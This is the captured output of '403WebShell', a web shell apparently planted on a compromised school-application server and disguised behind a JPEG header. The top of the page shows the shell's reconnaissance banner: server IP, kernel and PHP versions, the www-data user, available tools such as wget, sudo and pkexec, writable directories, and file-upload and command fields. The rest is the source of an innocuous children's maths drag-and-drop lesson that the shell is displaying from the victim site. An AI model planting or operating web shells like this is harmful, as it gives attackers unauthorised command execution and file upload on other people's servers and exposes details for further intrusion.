????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.135.224.139
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelE/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelE/Category2/LevelECat2Lesson4.html
<!DOCTYPE html>
<html>
    <head>
            <title>Drag number between numbers:</title>
            
            <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
            <style type="text/css"></style>
            
            <script>
                function page_preLoad()
                {
                    shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No2);
                    
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No2, 4), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, false, true, true);

                    var ids_headings = ['id_td_heading1'];
                    var ids_boxes = ['id_canvas_no25', 'id_canvas_no36', 'id_canvas_no44', 'id_canvas_no29', 'id_canvas_no20', 'id_canvas_no48'];
                    var ids_tds = ['id_td_no23', 'id_td_no25', 'id_td_no28', 'id_td_no34', 'id_td_no38', 'id_td_no36', 'id_td_no44', 'id_td_no42', 'id_td_no46', 'id_td_no31', 'id_td_no27', 'id_td_no29', 'id_td_no20', 'id_td_no18', 'id_td_no22', 'id_td_no45', 'id_td_no48', 'id_td_no50'];
                    var ids_spans = ['id_span_no23', 'id_span_no25', 'id_span_no28', 'id_span_no34', 'id_span_no38', 'id_span_no36', 'id_span_no44', 'id_span_no42', 'id_span_no46', 'id_span_no31', 'id_span_no27', 'id_span_no29', 'id_span_no20', 'id_span_no18', 'id_span_no22', 'id_span_no45', 'id_span_no48', 'id_span_no50'];

                    var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6'];


                    var ids_All = ids_spans.concat(ids_headings, ids_texts, ids_tds);
                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);

                    shared_init_dropBox_tds_withOUT_drag_here(ids_boxes);
                    shared_init_dropping_spans(ids_spans);
                }
            
                function page_onLoad()
                {
                    loadInitialInfo();
                }

                function loadInitialInfo()
                {
                    drawCircleAndNumber('id_td_drop_no24', 'id_canvas_no24', false, 24);
                    drawCircleAndNumber('id_td_drop_no25', 'id_canvas_no25', true, 25);
                    drawCircleAndNumber('id_td_drop_no26', 'id_canvas_no26', false, 26);
                    drawCircleAndNumber('id_td_drop_no35', 'id_canvas_no35', false, 35);
                    drawCircleAndNumber('id_td_drop_no36', 'id_canvas_no36', true, 36);
                    drawCircleAndNumber('id_td_drop_no37', 'id_canvas_no37', false, 37);
                    drawCircleAndNumber('id_td_drop_no43', 'id_canvas_no43', false, 43);
                    drawCircleAndNumber('id_td_drop_no44', 'id_canvas_no44', true, 44);
                    drawCircleAndNumber('id_td_drop_no45', 'id_canvas_no45', false, 45);
                    drawCircleAndNumber('id_td_drop_no28', 'id_canvas_no28', false, 28);
                    drawCircleAndNumber('id_td_drop_no29', 'id_canvas_no29', true, 29);
                    drawCircleAndNumber('id_td_drop_no30', 'id_canvas_no30', false, 30);
                    drawCircleAndNumber('id_td_drop_no19', 'id_canvas_no19', false, 19);
                    drawCircleAndNumber('id_td_drop_no20', 'id_canvas_no20', true, 20);
                    drawCircleAndNumber('id_td_drop_no21', 'id_canvas_no21', false, 21);
                    drawCircleAndNumber('id_td_drop_no47', 'id_canvas_no47', false, 47);
                    drawCircleAndNumber('id_td_drop_no48', 'id_canvas_no48', true, 48);
                    drawCircleAndNumber('id_td_drop_no49', 'id_canvas_no49', false, 49);
                }

                function drawCircleAndNumber(id_td, idCanvas, isCirclesRequired, number)
                {
                    var eTd = document.getElementById(id_td);
                    var eTdRectangle = eTd.getBoundingClientRect();

                    var widthTd = eTdRectangle.width;
                    var heightTd = eTdRectangle.height;

                    var tdSquareWidthHeight = Math.min(widthTd, heightTd);

                    //Newly added
                    if (shared_currentDeviceOS == shared_deviceOS_Android)
                    {
                        //tdSquareWidthHeight *= 0.97;//original
                        tdSquareWidthHeight *= 2.5;//oct30
                    }
                    else
                    {
                        tdSquareWidthHeight *= 2.5;
                    }

                    var tdCanvasWidthOrHeightHalf = tdSquareWidthHeight / 2.0;
                    var smallCircleCanvasWidthHeight = (tdCanvasWidthOrHeightHalf / 4.0);
                    var circlesRadius = smallCircleCanvasWidthHeight / 2.1;

                    var centerPoint = new Point((widthTd / 2.0) + eTdRectangle.left, (heightTd / 2.0) + eTdRectangle.top);

                    var eSmallCircle = document.getElementById(idCanvas);
                    eSmallCircle.width = smallCircleCanvasWidthHeight;
                    eSmallCircle.height = smallCircleCanvasWidthHeight;
                    //eSmallCircle.style.left = (centerPoint.x -  smallCircleCanvasWidthHeight / 2.0)+ 'px';
                    eSmallCircle.style.left = (centerPoint.x -  smallCircleCanvasWidthHeight / 1.85)+ 'px';
                    eSmallCircle.style.top = (centerPoint.y -  smallCircleCanvasWidthHeight / 1.85)+ 'px';
                    eSmallCircle.circlesRadius = circlesRadius;

                    setSmallCircleInfo(idCanvas, circlesRadius, isCirclesRequired, number);
                }

                function setSmallCircleInfo(id_circle, circlesRadius, isCirclesRequired, number)
                {
                    var eDropBoxSmallCircle = document.getElementById(id_circle);

                    var eDropBoxSmallCircleContext = eDropBoxSmallCircle.getContext("2d");

                    eDropBoxSmallCircleContext.beginPath();

                    if (isCirclesRequired)
                    {
                        eDropBoxSmallCircleContext.arc(circlesRadius, circlesRadius, circlesRadius , 0, 2*Math.PI);
                        eDropBoxSmallCircleContext.strokeStyle = 'transparent';//'transparent';
                        eDropBoxSmallCircleContext.stroke();
                        eDropBoxSmallCircleContext.fillStyle = 'transparent';//Light gray //'6699FF'; //light blue
                        eDropBoxSmallCircleContext.fill();
                    }
                    else
                    {
                        //var xPosition = circlesRadius * 1.15;
                        var xPosition = circlesRadius * 1.16;

                        eDropBoxSmallCircleContext.font = (circlesRadius)+ 'px Arial Rounded MT Bold';
                        eDropBoxSmallCircleContext.fillStyle = 'black';
                        eDropBoxSmallCircleContext.textAlign = 'center';
                        eDropBoxSmallCircleContext.textBaseline = 'middle';
                        eDropBoxSmallCircleContext.fillText(number, xPosition, circlesRadius);
                    }
                }

                function DragDrop(id_dropBox, ids_array)
                {
                    if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                    {
                        var eCurrentDropped = document.getElementById(shared_currentDropingId);

                        var eDropBoxCircle = document.getElementById(id_dropBox);
                        var circlesRadius = eDropBoxCircle.circlesRadius;

                        var xPosition = eCurrentDropped.innerText.valueOf() < 10 ? (circlesRadius * 1.15) : circlesRadius;

                        var eDropBoxContext = eDropBoxCircle.getContext("2d");

                        eDropBoxContext.strokeStyle = 'black';
                        eDropBoxContext.stroke();
                        eDropBoxContext.fillStyle = shared_colorLightGreen;
                        eDropBoxContext.fill();

                        eDropBoxContext.beginPath();
                        eDropBoxContext.font = circlesRadius + 'px Arial Rounded MT Bold';
                        eDropBoxContext.fillStyle = 'black';
                        eDropBoxContext.textAlign = 'center';
                        eDropBoxContext.textBaseline = 'middle';
                        eDropBoxContext.fillText(eCurrentDropped.innerText, xPosition, circlesRadius);

                        eCurrentDropped.innerText = '';
                        eCurrentDropped.hidden = true;
                        eCurrentDropped.isMoved = true;//Newly added 0n 17-jul-2014

                        isAllInfosMovedShowClapsAnimation();

                        shared_set_currentDropingId_draggbleToFalse();
                    }
                    else
                    {
                        shared_resetCurrentDroppingPosition2(id_dropBox);
                    }
                }

                function btnPrevious_click()
                {
                    window.location = 'LevelECat2Lesson3.html';
                }

                function btnNext_click()
                {
                    window.location = 'LevelECat2Lesson5.html';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelE');
                }
            
                function isAllInfosMovedShowClapsAnimation()
                {
                    var ids_boxes = ['id_canvas_no25', 'id_canvas_no36', 'id_canvas_no44', 'id_canvas_no29', 'id_canvas_no20', 'id_canvas_no48'];
                    
                    shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
                }
        </script>
    </head>
    
    <body onload="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
    
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-collapse: collapse">
                        <tr height="2%">
                            <td id="id_td_heading1" class="shared_style_options_blue_24px_bold">
                                <u>Drag number between numbers:</u>
                            </td>
                        </tr>
                        <tr height="*">
                            <td>
                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%" style="border-collapse: collapse">
                                    <tr>
                                        <td style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="35%">
                                                    <td style="border-bottom: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="50%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-top: none; border-right: none; border-left: none">
                                                                        <tr>
                                                                            <td id="id_td_text1" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">1.</td>
                                                                            <td id="id_td_drop_no24" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no25" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no25'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no25')"
                                                                                ondrop="DragDrop('id_canvas_no25', ['id_span_no25'])">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no26" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-top: none; border-left: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no23" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no23">23</span>
                                                                                        </td>
                                                                                        <td id="id_td_no25" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no25">25</span>
                                                                                        </td>
                                                                                        <td id="id_td_no28" width="*" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no28">28</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="35%">
                                                    <td style="border-bottom: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                            <tr height="50%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr>
                                                                            <td id="id_td_text2" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">2.</td>
                                                                            <td id="id_td_drop_no35" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no36" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no36'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no36')"
                                                                                ondrop="DragDrop('id_canvas_no36', ['id_span_no36'])" >
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no37" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"  style="border-top: none; border-bottom: none; border-left: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no34" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no34">34</span>
                                                                                        </td>
                                                                                        <td id="id_td_no38" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no38">38</span>
                                                                                        </td>
                                                                                        <td id="id_td_no36" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no36">36</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr height="35%">
                                                    <td style="border-bottom: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="50%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-bottom: none; border-left: none; border-right: none">
                                                                        <tr>
                                                                            <td id="id_td_text3" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">3.</td>
                                                                            <td id="id_td_drop_no43" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no44" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no44'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no44')"
                                                                                ondrop="DragDrop('id_canvas_no44', ['id_span_no44'])">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no45" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-left: none; border-bottom: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no44" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no44">44</span>
                                                                                        </td>
                                                                                        <td id="id_td_no42" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no42">42</span>
                                                                                        </td>
                                                                                        <td id="id_td_no46" width="*" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no46">46</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="35%">
                                                    <td style="border-bottom: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                            <tr height="58%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border: none">
                                                                        <tr>
                                                                            <td id="id_td_text4" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">4.</td>
                                                                            <td id="id_td_drop_no28" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no29" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no29'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no29')"
                                                                                ondrop="DragDrop('id_canvas_no29', ['id_span_no29'])">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no30" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"  style="border-bottom: none; border-left: none; border-top: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no31" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no31">31</span>
                                                                                        </td>
                                                                                        <td id="id_td_no27" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no27">27</span>
                                                                                        </td>
                                                                                        <td id="id_td_no29" width="33%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no29">29</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td style="padding-bottom: 0px">
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="35%">
                                                    <td style="border-bottom: 0px">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                            <tr height="58%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-right: none; border-left: none">
                                                                        <tr>
                                                                            <td id="id_td_text5" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">5.</td>
                                                                            <td id="id_td_drop_no19" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no20" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no20'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no20')"
                                                                                ondrop="DragDrop('id_canvas_no20', ['id_span_no20'])">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no21" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"  style="border-left: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no20" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no20">20</span>
                                                                                        </td>
                                                                                        <td id="id_td_no18" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no18">18</span>
                                                                                        </td>
                                                                                        <td id="id_td_no22" width="*" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no22">22</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr>
                                        <td>
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                <tr height="35%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
                                                            <tr height="58%" width="100%">
                                                                <td width="70%">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border-left: none; border-right: none;">
                                                                        <tr>
                                                                            <td id="id_td_text6" class="shared_style_blue_24px_padding_left_2_percent" width="*" align="center" style="border-right: none">6.</td>
                                                                            <td id="id_td_drop_no47" width="32%" align="center" style="border-left: none; border-right: none">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no48" width="32%" align="center" style="border-right: none"
                                                                                ondragover="shared_highlight('id_canvas_no48'); shared_allowDrop_web(event)"
                                                                                ondragleave="shared_un_highlight2('id_canvas_no48')"
                                                                                ondrop="DragDrop('id_canvas_no48', ['id_span_no48'])">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                            <td id="id_td_drop_no49" width="32%" align="center">
                                                                                <img src="../../../img/LevelE/Category2/LevelECat2Lesson4/empty.png" width="58%" height="auto">
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                                <td width="*">
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"  style="border-left: none">
                                                                        <tr>
                                                                            <td>
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td id="id_td_no45" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no45">45</span>
                                                                                        </td>
                                                                                        <td id="id_td_no48" width="34%" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no48">48</span>
                                                                                        </td>
                                                                                        <td id="id_td_no50" width="*" align="center" class="shared_style_red_24px_bold" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_no50">50</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>


                        <canvas id="id_canvas_no24" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no25"
                                ondragover="shared_highlight('id_canvas_no25'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no25')"
                                ondrop="DragDrop('id_canvas_no25', ['id_span_no25'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no26" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no35" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no36"
                                ondragover="shared_highlight('id_canvas_no36'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no36')"
                                ondrop="DragDrop('id_canvas_no36', ['id_span_no36'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no37" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no43" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no44"
                                ondragover="shared_highlight('id_canvas_no44'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no44')"
                                ondrop="DragDrop('id_canvas_no44', ['id_span_no44'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no45" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no28" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no29"
                                ondragover="shared_highlight('id_canvas_no29'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no29')"
                                ondrop="DragDrop('id_canvas_no29', ['id_span_no29'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no30" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no19" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no20"
                                ondragover="shared_highlight('id_canvas_no20'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no20')"
                                ondrop="DragDrop('id_canvas_no20', ['id_span_no20'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no21" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no47" style="position:absolute"></canvas>
                        <canvas id="id_canvas_no48"
                                ondragover="shared_highlight('id_canvas_no48'); shared_allowDrop_web(event)"
                                ondragleave="shared_un_highlight('id_canvas_no48')"
                                ondrop="DragDrop('id_canvas_no48', ['id_span_no48'])"
                                style="position:absolute"></canvas>
                        <canvas id="id_canvas_no49" style="position:absolute"></canvas>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>

        </table>
        
        <script>
            page_preLoad();

            new webkit_draggable('id_span_no23', {handle : 'id_td_no23', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no25', {handle : 'id_td_no25', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no28', {handle : 'id_td_no28', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no34', {handle : 'id_td_no34', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no38', {handle : 'id_td_no38', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no36', {handle : 'id_td_no36', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no44', {handle : 'id_td_no44', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no42', {handle : 'id_td_no42', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no46', {handle : 'id_td_no46', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no31', {handle : 'id_td_no31', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no27', {handle : 'id_td_no27', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no29', {handle : 'id_td_no29', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no20', {handle : 'id_td_no20', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no18', {handle : 'id_td_no18', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no22', {handle : 'id_td_no22', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no45', {handle : 'id_td_no45', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no48', {handle : 'id_td_no48', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no50', {handle : 'id_td_no50', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});

